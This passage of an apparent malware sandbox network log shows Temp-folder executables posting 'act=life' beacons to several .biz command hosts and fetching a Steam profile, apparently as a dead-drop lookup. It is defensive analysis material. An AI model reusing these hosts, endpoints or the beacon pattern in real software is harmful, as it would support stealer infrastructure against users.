2024-12-14 22:58:18 UTC	1009	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9vbpq7hmno7jshrcfdb987hjt7; expires=Wed, 09-Apr-2025 16:44:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kcw6MdKUb7gFY47kN0GU6mtmAvB6kxbvdQ81Nf%2BeRzqUPHtyjehVsPvcD0h6mdoSqo7RCbL1QST4c4jjAVL8k44XcVtj2JotormVTfjmAA8vHmLrnJpMI8e8qysqyhs0jQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cc3faa4bde9a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1553&min_rtt=1541&rtt_var=603&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=905&delivery_rate=1778319&cwnd=209&unsent_bytes=0&cid=fd0181a5e83371f8&ts=732&x=0"
2024-12-14 22:58:18 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49794	104.21.22.222	443	5444	C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:20 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 22:58:20 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:20 UTC	1011	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=9nso1di3p3uc0fid2rj6qilg5h; expires=Wed, 09-Apr-2025 16:44:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HGxD9%2BsxvvRfuG%2FONXjLKhty%2B4trNE6GDzqD6jY1XnVZNOQqqSep3YFIEzwcf5nm8FhHkkh8eiIoki6gxiQf94nZb4g1yHVu4iLU6tDp25UNtYjkn9f7VrEOWxNuNdShbv4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cc4d5e2c8c90-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1809&rtt_var=686&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1587819&cwnd=201&unsent_bytes=0&cid=fa79af314e8fac75&ts=739&x=0"
2024-12-14 22:58:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49800	104.21.64.1	443	5444	C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:22 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 22:58:22 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:23 UTC	1010	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nm7ne6o758b1qqlrp51rs0ika6; expires=Wed, 09-Apr-2025 16:45:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lVmJlkMQoMOFBD3ElPwEukV9ywOz2bUijQPhvuseEfAulk9Bwzxc51KRBKTbM79Bf5vOLUBMRIRla3yk2bAo4WjYasir1CV4utKK%2BGXPeoiSkI%2BpEOII0A%2FB7RWNOCRziRAZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cc5c19e37c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1942&rtt_var=747&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=907&delivery_rate=1445544&cwnd=218&unsent_bytes=0&cid=5bc24a86ff21e2b9&ts=1004&x=0"
2024-12-14 22:58:23 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49812	104.102.49.254	443	5444	C:\Users\user\AppData\Local\Temp\1015327001\H9TU4oY.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:26 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 22:58:27 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 22:58:27 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=439d6cf2216a967373684c21; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 22:58:27 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 22:58:27 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 22:58:27 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 22:58:27 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49842	104.21.50.161	443	1276	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:37 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-14 22:58:37 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:37 UTC	1014	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=nm7iq805m3mh2oqg5dajmj4ks8; expires=Wed, 09-Apr-2025 16:45:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4565iQS9i1HFjda%2BcICT0CUy9EkNqRkGCcbDoqrnr%2Fs0yufjXzU1tPsO5VBm3VNx6JUAf3AUF1zL42ULFGmEHtqpnMG4TD%2F5TQOFa%2FIIRArpj2Tr4kXu6PJoBffD3nHLVyk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21ccb6cb01185d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1453&rtt_var=578&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1842271&cwnd=238&unsent_bytes=0&cid=45bc9c4a090f688f&ts=1096&x=0"
2024-12-14 22:58:37 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49848	104.21.22.222	443	1276	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:39 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: immureprech.biz
2024-12-14 22:58:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:39 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lm9c45duhu4n514oflssrc14ah; expires=Wed, 09-Apr-2025 16:45:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CU5iwROoib8OUFx3AlSva3%2BscVnM2rF2LRsiKeFLCtQsVG%2F95G8N%2Btl2%2F7LNDhkhS41iccOApCVkwJHFzkeLjzq%2BAc5Xiypl3Z8vfotNPRmMcmSW0jsYPg8tw9c5Cbzlyqs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21ccc3bc5d41bb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1571&rtt_var=612&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=906&delivery_rate=1755862&cwnd=205&unsent_bytes=0&cid=50d92406f66da2eb&ts=734&x=0"
2024-12-14 22:58:39 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49854	104.21.64.1	443	1276	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:40 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: deafeninggeh.biz
2024-12-14 22:58:40 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:41 UTC	1015	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=p5tjbhhfbu545en7l3muj8fu5o; expires=Wed, 09-Apr-2025 16:45:20 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLsdh%2B12cocUG2QgQCJI%2BAcZna7F87hzHA49Jscj%2F5D1PVLnO3KOKAv6qsMpRB3ZZS4GPGdUw%2Fhkr9vMyg9giHrt3S3dm31bmGB0bXx8zhjkvmoeZRBnnnm%2Bjpq%2FbzHj51DZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cccff9347c6a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2059&rtt_var=811&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=1317095&cwnd=218&unsent_bytes=0&cid=36274c24df008280&ts=730&x=0"
2024-12-14 22:58:41 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-12-14 22:58:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49862	104.102.49.254	443	1276	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:44 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-12-14 22:58:45 UTC	1905	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 14 Dec 2024 22:58:45 GMT Content-Length: 35131 Connection: close Set-Cookie: sessionid=a9d5739ceead1a33081361ad; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-14 22:58:45 UTC	14479	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-14 22:58:46 UTC	16384	IN	Data Raw: 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 Data Ascii: munity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SU
2024-12-14 22:58:46 UTC	3768	IN	Data Raw: 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 61 63 74 75 61 6c 5f 70 65 72 Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="actual_per
2024-12-14 22:58:46 UTC	500	IN	Data Raw: 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22 3e 0a 09 09 09 09 3c 64 69 76 Data Ascii: Subscriber Agreement</a>  \|  <a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"><div

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49880	104.21.50.161	443	940	C:\Users\user\AppData\Local\Temp\1015352001\c1ca3b12e5.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:58:50 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: tacitglibbr.biz
2024-12-14 22:58:50 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-14 22:58:51 UTC	1012	IN	HTTP/1.1 200 OK Date: Sat, 14 Dec 2024 22:58:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gke93ju6fj97h1paql6sv7a50v; expires=Wed, 09-Apr-2025 16:45:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Yvz1v3MFPrxqRM079Ix8SCxxUry5sieWdIpG%2FfOyy5aVukuuiQUUvJkUnbinOv4NpELerhNszt1aHyjXFrj8O%2B76yclBw%2FwrodWIxR2PEF0D3B2CavYpFBIicoVjh4NEauk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f21cd0afa634262-EWR alt-svc: h3=":443"; ma=86400 server-timing: 